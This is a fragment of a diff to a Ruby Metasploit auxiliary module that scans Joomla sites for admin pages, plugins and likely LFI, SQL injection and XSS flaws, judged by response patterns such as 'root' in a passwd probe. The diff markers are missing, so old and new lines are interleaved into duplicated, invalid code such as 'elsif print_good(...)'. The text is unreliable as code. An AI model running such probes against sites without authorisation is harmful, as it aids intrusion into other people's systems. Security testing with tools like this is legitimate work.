if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/)
sout = "Administrator Login Page"
sout = "**Administrator Login Page"
elsif(res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/)
sout = "Registration Page"
sout = "**Registration Page"
else
sout = iapp
sout = iapp
end
return if not sout
if(sout == iapp)
print_good("#{iapp}")
elsif print_good("#{sout}: #{iapp} ")
print_good("#{peer} - Page: #{tpath}#{iapp}")
elsif print_good("#{peer} - Page: #{tpath}#{iapp} #{sout}")
report_note(
:host => ip,
:port => datastore['RPORT'],
@ -192,58 +204,64 @@ class Metasploit3 < Msf::Auxiliary
:data => sout
)
end
elsif(res.code.to_i == 403 and datastore['VERBOSE'])
elsif(res.code == 403)
if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
print_status("#{ip} denied access to #{url} (SSL Required)")
vprint_status("#{ip} denied access to #{ip} (SSL Required)")
elsif(res.body =~ /has a list of IP addresses that are not allowed/)
print_status("#{ip} restricted access by IP")
vprint_status("#{ip} restricted access by IP")
elsif(res.body =~ /SSL client certificate is required/)
print_status("#{ip} requires a SSL client certificate")
vprint_status("#{ip} requires a SSL client certificate")
else
print_status("#{ip} denied access to #{url} #{res.code} #{res.message}")
vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}")
end
end
rescue OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL error")
return :abort
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
vprint_error("#{peer} - Unable to Connect")
return :abort
rescue ::Timeout::Error, ::Errno::EPIPE
vprint_error("#{peer} - Timeout error")
return :abort
end
def plugin_search (tpath, papp, ip, bres)
def plugin_search(tpath, papp, ip, bres)
res = send_request_cgi({
'uri' => "#{datastore['PATH']}" << papp,
'uri' => "#{tpath}" << papp,
'method' => 'GET',
}, 5)
return if not res or not res.body or not res.code
res.body.gsub!(/[\r|\n]/, ' ')
osize = bres.body.size
nsize = res.body.size
if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize)
print_good("Found Plugin: #{papp} ")
if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize)
print_good("#{peer} - Plugin: #{tpath}#{papp} ")
if (papp =~/passwd/ and res.body !~/root/)
print_error("Passwd not found")
vprint_error("#{peer} - Vulnerability: LFI not found")
elsif(papp =~/passwd/ and res.body =~/root/)
print_good("Passwd file found in response")
print_good("#{peer} - Vulnerability: Potential LFI")
elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/)
print_good("Possible SQL Injection")
print_good("#{peer} - Vulnerability: Potential SQL Injection")
elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/)
print_error("Unable to identify SQL injection")
vprint_error("#{peer} - Vulnerability: Unable to identify SQL injection")
elsif(papp =~/>alert/ and res.body !~/>alert/)
print_error("No XSS")
vprint_error("#{peer} - Vulnerability: No XSS")
elsif(papp =~/>alert/ and res.body =~/>alert/)
print_good("Possible XSS")
print_good("#{peer} - Vulnerability: Potential XSS")
elsif(res.body =~/SQL syntax/ )
print_good("Possible SQL Injection")
print_good("#{peer} - Vulnerability: Potential SQL Injection")
elsif(papp =~/com_/)
vars = papp.split('_')
pages = vars[1].gsub('/','')
res1 = send_request_cgi({
'uri' => "#{datastore['PATH']}"<<"index.php?option=com_#{pages}",
'uri' => "#{tpath}"<<"index.php?option=com_#{pages}",
'method' => 'GET',
}, 5)
if (res1.code.to_i == 200)
print_good("Found Page: index.php?option=com_#{pages}")
if (res1.code == 200)
print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}")
else
print_error("#{datastore['PATH']}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response")
vprint_error("#{peer} - Page: #{tpath}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response")
end
end
report_note(
@ -253,21 +271,27 @@ class Metasploit3 < Msf::Auxiliary
:ntype => 'Plugin Found',
:data => papp
)
elsif(res.code.to_i == 403 and datastore['VERBOSE'])
elsif(res.code == 403)
if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
print_status("#{ip} denied access to #{url} (SSL Required)")
vprint_status("#{ip} ip access to #{ip} (SSL Required)")
elsif(res.body =~ /has a list of IP addresses that are not allowed/)
print_status("#{ip} restricted access by IP")
vprint_status("#{ip} restricted access by IP")
elsif(res.body =~ /SSL client certificate is required/)
print_status("#{ip} requires a SSL client certificate")
vprint_status("#{ip} requires a SSL client certificate")
else
print_status("#{ip} denied access to #{url} #{res.code} #{res.message}")
vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}")
end
end
rescue OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL error")
return :abort
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
vprint_error("#{peer} - Unable to Connect")
return :abort
rescue ::Timeout::Error, ::Errno::EPIPE
vprint_error("#{peer} - Timeout error")
return :abort
end